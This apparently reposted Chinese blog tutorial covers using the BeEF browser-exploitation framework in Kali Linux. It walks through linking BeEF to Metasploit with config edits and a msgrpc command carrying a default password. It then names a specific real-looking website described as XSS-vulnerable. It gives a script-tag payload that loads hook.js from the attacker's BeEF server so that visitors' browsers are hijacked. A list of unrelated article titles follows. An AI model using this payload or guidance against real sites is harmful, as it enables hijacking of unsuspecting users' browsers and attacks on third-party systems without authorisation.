xss利用之kali神器beef
来源:互联网 发布:数据整理软件 编辑:程序博客网 时间:2024/06/08 07:56
1、beef基本配置
BeEF在Kali下默认安装,直接找到对应图标启动即可,但是默认设置未同Metasploit关联,无法使用msf模块,因此需要作如下配置连接msf
1、修改config.yaml
编辑/usr/share/beef-xss/config.yaml
metasploit: enable: false改为true
编辑/usr/share/beef-xss/extensions/demos/config.yaml
enable:true改为false
编辑/usr/share/beef-xss/extensions/metasploit/config.yaml
设置 ssl: true ssl_version: 'TLSv1'
2、启动msf服务
service postgresql startservice metasploit startmsfconsoleload msgrpc ServerHost=127.0.0.1 User=msf Pass=abc123 SSL=y
3、运行BeEF.rb
cd /usr/share/beef-xss//usr/share/beef-xss/beef
(启动后不要关闭,不然登录界面会提示密码错误)
4、启动BeEF
弹出浏览器,输入默认用户名口令beef,即可登陆
主界面如图
2、废话不多说,直接上我们之前找到的xss网站 http://www.succulents-castle.com/Product.asp?BigClassName=aaa
由于为映射到公网,只能在自己内部测试,这里要xss注入攻击成功,有个关键的脚本
<script src="http://127.0.0.1:3000/hook.js"></script>注意这个127.0.0.1ip地址要改为自己本机的ip地址,比如192.168.1.1,就是你beef配置的ip
3、直接到我们beef里面,就可以看到劫持到的主机浏览器信息
ok
0 0
- xss利用之kali神器beef
- kali漏洞利用之BeeF
- kali beef-xss结合metasploit配置
- XSS框架之安装BEEF
- 学习笔记--kali -beef
- kali下beef使用
- 利用Beef劫持客户端浏览器
- 浏览器利用框架BeEF测试
- kali漏洞利用之Metasploit实战
- kali漏洞利用之Meterpreter介绍
- beef
- BeEF
- Beef
- XSS利用之延长Session生命周期
- Kali下beEF关联metasploit的攻击模块
- Kali下beEF关联metasploit的攻击模块
- Kali下beEF关联metasploit的攻击模块
- BruteXSS:XSS暴力破解神器
- v$sesstat与v$sysstat之TABLE SCAN ROWS GOTTEN
- 第一天
- hdu 1754 I Hate It 线段树
- try catch
- 浏览器不能正常上网
- xss利用之kali神器beef
- 表格点击变成input框可编辑
- matlab GUI自定义图片做背景
- zookeeper实践(一) 应用场景和能力
- GetItemText
- 甲骨文要放弃不赚钱的Java?开发者心痛
- 理解WebKit和Chromium: 网页渲染的基本过程
- Activiti基础教程--07流程执行历史记录(历史任务、历史流程实例、历史活动)
- MyBatis中的foreach使用